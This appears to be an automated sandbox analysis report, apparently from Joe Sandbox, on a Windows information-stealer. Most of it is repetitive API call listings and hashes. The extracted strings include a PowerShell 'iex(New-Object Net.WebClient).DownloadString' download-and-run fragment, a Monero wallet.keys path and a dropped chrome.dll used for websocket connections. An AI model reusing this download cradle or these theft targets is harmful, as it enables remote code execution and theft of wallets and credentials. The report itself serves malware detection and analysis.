                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: d3aa4a4cfbec60d0aebc46bd1a21c543a219d3b19cbecd13897ad8bfe569daf1
                                        • Instruction ID: 53472e74ecbe114eefdfddc47e3857cdd356d144bc535d42fa6af9a0c70fbfab
                                        • Opcode Fuzzy Hash: d3aa4a4cfbec60d0aebc46bd1a21c543a219d3b19cbecd13897ad8bfe569daf1
                                        • Instruction Fuzzy Hash: 72410BB190020C9ADB14EFA1C8A6BFDBB79AF10304F40455EE20A77196DF782A59CF59
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0145DA80,00000000,00020119,?), ref: 004F4344
                                        • RegQueryValueExA.ADVAPI32(?,0145E388,00000000,00000000,00000000,000000FF), ref: 004F4368
                                        • RegCloseKey.ADVAPI32(?), ref: 004F4372
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F4397
                                        • lstrcat.KERNEL32(?,0145E2C8), ref: 004F43AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 4b334372bc49d316d97c083977285bd8ec997a3e4bfac3a5beedfdcb4ea5a84f
                                        • Instruction ID: eabde9f1986aaba6bec3e0fa8bfd81ae0ab97a001739f893925d11afe22412f7
                                        • Opcode Fuzzy Hash: 4b334372bc49d316d97c083977285bd8ec997a3e4bfac3a5beedfdcb4ea5a84f
                                        • Instruction Fuzzy Hash: 974196B690010C6BDF14EBA0EC46FFE733CAB88300F00865DB71556181EE7D5A88CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: 724d4a980bd977a2359795c85860e3e22e17eae4c310c575ee611e69edabb4fc
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 0C21AE72D40759AFDB229E15CC569BF3E79FB81B92F05415BFC286B210C3308D498BA0
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 004F6C0C
                                        • sscanf.NTDLL ref: 004F6C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004F6C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004F6C60
                                        • ExitProcess.KERNEL32 ref: 004F6C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 6387252e162361e2466f6b5b50a3b8d5ae58dd9e2e7f85197d019452333fd81c
                                        • Instruction ID: d2eb16e62088fa7fd28ffaee23da29c7567e77f6db1d65f041d94c08ee667b4e
                                        • Opcode Fuzzy Hash: 6387252e162361e2466f6b5b50a3b8d5ae58dd9e2e7f85197d019452333fd81c
                                        • Instruction Fuzzy Hash: 9421ADB5D1420D9BCF08EFE4E945AEEB7B5BF48304F04856EE516B3250EB389604CB69
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144BF90,00000000,00020119,?), ref: 004F7FEE
                                        • RegQueryValueExA.ADVAPI32(?,0145DA00,00000000,00000000,000000FF,000000FF), ref: 004F800F
                                        • RegCloseKey.ADVAPI32(?), ref: 004F8022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: ff5f8acdc2ec7f05c76175159ccfa8fab74dddec26ab96b19e57f4b39ac278f5
                                        • Instruction ID: 3b9f397c7b2c0335ec7c1259a1ac10a3aa4ab999993567e78248693559bdc94d
                                        • Opcode Fuzzy Hash: ff5f8acdc2ec7f05c76175159ccfa8fab74dddec26ab96b19e57f4b39ac278f5
                                        • Instruction Fuzzy Hash: 9E110DB1A44209AFD704CF94DD45FBBBBB8FB44B10F108219F615AA280DB795904CBA5
                                        APIs
                                        • StrStrA.SHLWAPI(0145DF68,00000000,00000000,?,004E9F71,00000000,0145DF68,00000000), ref: 004F93FC
                                        • lstrcpyn.KERNEL32(007B7580,0145DF68,0145DF68,?,004E9F71,00000000,0145DF68), ref: 004F9420
                                        • lstrlen.KERNEL32(00000000,?,004E9F71,00000000,0145DF68), ref: 004F9437
                                        • wsprintfA.USER32 ref: 004F9457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 855ccb3c4f0ca7c6b0ac5abefe0790280e1caf24774bfd0eeb11f05b7040a6c5
                                        • Instruction ID: 5e65f8a1ed7f59a83a3594ec7088223d19261d665ac3101851b22f54eb69f027
                                        • Opcode Fuzzy Hash: 855ccb3c4f0ca7c6b0ac5abefe0790280e1caf24774bfd0eeb11f05b7040a6c5
                                        • Instruction Fuzzy Hash: 9A01DE7550810CFFCB18DFA8C948FAE7B78FF88304F108258F9099B244D639AA51DBA4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004E12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004E12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004E12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 004E12FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: f22d39363887b092079493d0a9798e52287352d01323e70f76b2b5e7b8ec9e17
                                        • Instruction ID: 9903e1b14129666543a8ad07e6578e36d12a52d7938f5c4f2fe7ac9857a3b26c
                                        • Opcode Fuzzy Hash: f22d39363887b092079493d0a9798e52287352d01323e70f76b2b5e7b8ec9e17
                                        • Instruction Fuzzy Hash: 3101CD79A4420DBFDB04DFE4DC49FAE7778BB88701F108295FA15A7290D6749A00CBA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 7c486c9fba4c979a1cc1ad1f1e583b1e4acb8da7caa5ce556ad1eb965b2dfdd3
                                        • Instruction ID: 2ac1b0b6038d0644da5159327a0871013fd6894b972cb5fd344434c3cd69e97b
                                        • Opcode Fuzzy Hash: 7c486c9fba4c979a1cc1ad1f1e583b1e4acb8da7caa5ce556ad1eb965b2dfdd3
                                        • Instruction Fuzzy Hash: 634128B010078C9EDB318B24CEC4FFB7BE99B45304F1444EDEA8A97182D2759A45DF68
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004F6903
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F69C6
                                        • ExitProcess.KERNEL32 ref: 004F69F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: bf16e9f1cd3d06068b587cc0eff1060e113ce78a4768bb899a47df17d001c314
                                        • Instruction ID: 7435054bb902377a39e330a1a2785967a5bb0eb585baac8709f2c3f3c78d4309
                                        • Opcode Fuzzy Hash: bf16e9f1cd3d06068b587cc0eff1060e113ce78a4768bb899a47df17d001c314
                                        • Instruction Fuzzy Hash: F83128F1901218AADB15EB91DC92FEEB778AF48304F40418EF30966191DF786B48CF69
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00500E10,00000000,?), ref: 004F89BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F89C6
                                        • wsprintfA.USER32 ref: 004F89E0
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 258948f8afee18ed15e7a5740dc25dd0799de1fee177c633ae001d3e39419026
                                        • Instruction ID: f0759327fae63ed0984612d40a94dba65555cff16d5a2ecd5bf9b47fe21c4be8
                                        • Opcode Fuzzy Hash: 258948f8afee18ed15e7a5740dc25dd0799de1fee177c633ae001d3e39419026
                                        • Instruction Fuzzy Hash: E92133B1A44208AFDB04DF94DD45FAEBBB8FB48711F108219F615B72C0C7795900CBA5
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004EA098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: 2624ec209eb2c34f9fc1a10a837f3aa71b68cc11e641b8b139cb9c4cb898d0bd
                                        • Instruction ID: 57498865f51bf90bb75b3b40632bc9b1519d70efceb5b21e04016bc7d41e2ef0
                                        • Opcode Fuzzy Hash: 2624ec209eb2c34f9fc1a10a837f3aa71b68cc11e641b8b139cb9c4cb898d0bd
                                        • Instruction Fuzzy Hash: A1F01D7065C244AED709BB65EC48F5636A4A785741F008627F005A7290C7BD6894CB6F
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004F96AE,00000000), ref: 004F8EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F8EF2
                                        • wsprintfW.USER32 ref: 004F8F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
